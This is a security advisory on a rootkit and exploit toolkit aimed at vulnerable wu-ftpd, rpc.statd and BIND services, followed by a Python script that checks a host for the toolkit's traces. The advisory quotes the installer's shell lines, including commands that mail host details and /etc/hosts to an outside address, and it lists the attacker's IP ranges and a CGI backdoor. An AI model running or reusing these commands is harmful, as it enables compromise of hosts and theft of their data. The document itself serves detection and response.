FYI: Another hacker tool has been detected in the wild. It is a combination of well-known scanners and exploits. Vulnerable wu-ftpd, rpc.statd and BIND services are the targets of this tool.

Right now it is unclear whether it is a fully functional "worm". It has code which allows it to spread via a vulnerable statd service, but that code has a small bug (according to the source code we have) which might be fixed in later versions. Several versions of this tool have been seen, each with a different set of programs. Here is what we know so far.

This tool replaces the following files with rootkited versions:

  /sbin/ifconfig  - hide sniffing
  /bin/netstat    - hide connections
  /bin/ps         - hide processes
  /usr/bin/top    - hide processes

The rootkited utilities hide information according to the configuration in the files /dev/dsx and /dev/caca. Each line holds a type number followed by the value to hide:

  type 0: hide uid
  type 1: hide local address
  type 2: hide remote address
  type 3: hide local port
  type 4: hide remote port
  type 5: hide UNIX socket path

The installer creates these files as follows:

  touch /dev/dsx
  echo "3 sl2" >>/dev/dsx
  echo "3 sshdu" >>/dev/dsx
  echo "3 linsniffer" >>/dev/dsx
  echo "3 smurf" >>/dev/dsx
  echo "3 slice" >>/dev/dsx
  echo "3 mech" >>/dev/dsx
  echo "3 muh" >>/dev/dsx
  echo "3 bnc" >>/dev/dsx
  echo "3 psybnc" >>/dev/dsx

  touch /dev/caca
  echo "1 193.231.139" >>/dev/caca
  echo "1 213.154.137" >>/dev/caca
  echo "1 193.254.34" >>/dev/caca
  echo "3 48744" >>/dev/caca
  echo "3 3666" >>/dev/caca
  echo "3 31221" >>/dev/caca
  echo "3 22546" >>/dev/caca
  echo "4 48744" >>/dev/caca
  echo "4 2222" >>/dev/caca

It installs the following files into /dev/ida/.inet/:

  linsniffer
  logclear
  sense
  sl2
  sshdu
  s
  ssh_host_key
  ssh_random_seed

* Another version of this tool installs the following files:

  bind        - BIND exploit (8.2, 8.2.1, 8.2.2, 8.2.2-REL, 8.2.2-P3, 8.2.2-P5, 8.2.2-P7 and 4.9.6-REL)
  bindscan
  broot       - shell script; compiles the bind portion of the exploit and runs bscan
  bscan       - BIND scanner
  cleaner     - log cleaner
  incerc      - shell script which runs bind or x496 depending on the BIND version
  linsniffer
  s           - sshd config
  scan        - statd scanner
  slice2      - SYN flooder, part of Blitznet.tgz, a DDoS tool which launches a distributed SYN flood attack with spoofed source IPs
  ssh_host_key
  ssh_random_seed
  sshdu       - ssh server
  statdx      - rpc.statd exploit for Red Hat 6.0 (knfsd-1.2.2-4), Red Hat 6.1 (knfsd-1.4.7-7) and Red Hat 6.2 (nfs-utils-0.1.6-2)
  tcp.log     - sniffer log
  vad         - sorts the output from LinSniffer
  wroot       - shell script; compiles the wu-ftpd portion of the exploit and runs wscan
  wscan       - wu-ftpd scanner
  wu          - wu-ftpd exploit
  x496        - exploit for BIND 4.9.6-REL

** Files installed on another penetrated machine:

  a           - directory containing Adore, a Linux LKM-based rootkit
  f
  linsniffer
  mech        - EnergyMech, a UNIX-compatible IRC bot
  o           - directory containing luckscan-a, luckscan-a.c, luckstatdx, luckstatdx.c, x
  pid         - pid file
  s
  ssh_host_key
  ssh_random_seed
  sshdu
  tcp.log
  trace
  vadimI
  vadimII
  w           - directory containing wroot, wscan, wscan.c, wu, wu.c
  w00f        - remote/local exploit for wuftp2.4.2academ beta 12-18 by Mixter

The tool uses /usr/bin/hdparm to start sshd and linsniffer. It sets the "immutable" (i) attribute on /usr/bin/hdparm with the command "chattr +i /usr/bin/hdparm". A file with the `i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to it, and no data can be written to it. Only the superuser can set or clear this attribute.

It tries to install the CGI program alya.cgi (which may execute shell commands) in one of the following directories:

  /home/httpd/cgi-bin/
  /usr/local/httpd/cgi-bin/
  /usr/local/apache/cgi-bin/
  /www/httpd/cgi-bin/
  /www/cgi-bin/

As a final step the rootkit emails information about the successfully compromised machine:

  ifconfig | grep inet >> /tmp/info
  uname -a >> /tmp/info
  cat /tmp/info | mail -s "port4545 rewting" andrei@andrei.ro
  cat /etc/hosts | mail -s "port4545 rewting" andrei@andrei.ro

References:

Permanent address of this article:
  http://cns.utoronto.ca/~scan/expltool.txt

ISC Bind 8 Transaction Signatures Buffer Overflow Vulnerability
  http://www.securityfocus.com/bid/2302
  http://www.redhat.com/support/errata/RHSA-2001-007.html
  http://www.cert.org/advisories/CA-2001-02.html
  http://www.isc.org/products/BIND/bind-security.html

Multiple Linux Vendor rpc.statd Remote Format String Vulnerability
  http://www.securityfocus.com/bid/1480

Wu-Ftpd Remote Format String Stack Overwrite Vulnerability
  http://www.securityfocus.com/bid/1387
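An added triage helper, not part of the original notice, that checks a filesystem tree (the live "/" or a mounted image) for the dropped files and cgi-bin backdoor listed above, reports whether /usr/bin/hdparm carries the immutable flag, and decodes /dev/dsx and /dev/caca using the type table above. It assumes lsattr is available for the immutable check and labels /dev/dsx entries with the table as written, even though the install lines pair type 3 with program names there.

```python
import os
import subprocess

# Meaning of the leading type number in /dev/dsx and /dev/caca, per the notice above.
HIDE_TYPES = {"0": "uid", "1": "local address", "2": "remote address",
              "3": "local port", "4": "remote port", "5": "UNIX socket path"}
# Files the tool drops, and the cgi-bin directories where alya.cgi may be placed.
DROPPED = ["dev/dsx", "dev/caca", "dev/ida/.inet"]
CGI_DIRS = ["home/httpd/cgi-bin", "usr/local/httpd/cgi-bin",
            "usr/local/apache/cgi-bin", "www/httpd/cgi-bin", "www/cgi-bin"]


def parse_hide_file(path):
    """Decode one hide-config file ("3 sl2", "1 193.231.139", ...) into
    (type, meaning, value) tuples; a missing file yields an empty list."""
    rules = []
    try:
        with open(path) as fh:
            for line in fh:
                parts = line.split(None, 1)
                if len(parts) == 2:  # skip blank or malformed lines
                    kind, value = parts[0], parts[1].strip()
                    rules.append((kind, HIDE_TYPES.get(kind, "unknown"), value))
    except OSError:
        pass
    return rules


def hdparm_immutable(root="/"):
    """True if lsattr shows the 'i' flag on /usr/bin/hdparm (the tool runs chattr +i);
    None when lsattr is unavailable or the file does not exist."""
    path = os.path.join(root, "usr/bin/hdparm")
    try:
        out = subprocess.run(["lsattr", "-d", path], capture_output=True,
                             text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return None
    return "i" in out.split()[0]


def triage(root="/"):
    """Collect indicators from the tree at `root` ("/" live, or a mounted image)."""
    f = {"dropped": [], "cgi_backdoor": [], "hdparm_immutable": hdparm_immutable(root)}
    for rel in DROPPED:
        if os.path.lexists(os.path.join(root, rel)):
            f["dropped"].append("/" + rel)
    for rel in CGI_DIRS:
        if os.path.isfile(os.path.join(root, rel, "alya.cgi")):
            f["cgi_backdoor"].append("/" + rel + "/alya.cgi")
    f["dsx"] = parse_hide_file(os.path.join(root, "dev/dsx"))
    f["caca"] = parse_hide_file(os.path.join(root, "dev/caca"))
    return f
```

Run it as triage("/") on a suspect host, or point it at the mount point of an image taken offline; the rootkited ps and netstat cannot interfere with plain file reads. Absence of these files is not proof of a clean system, since other versions of the tool use different paths.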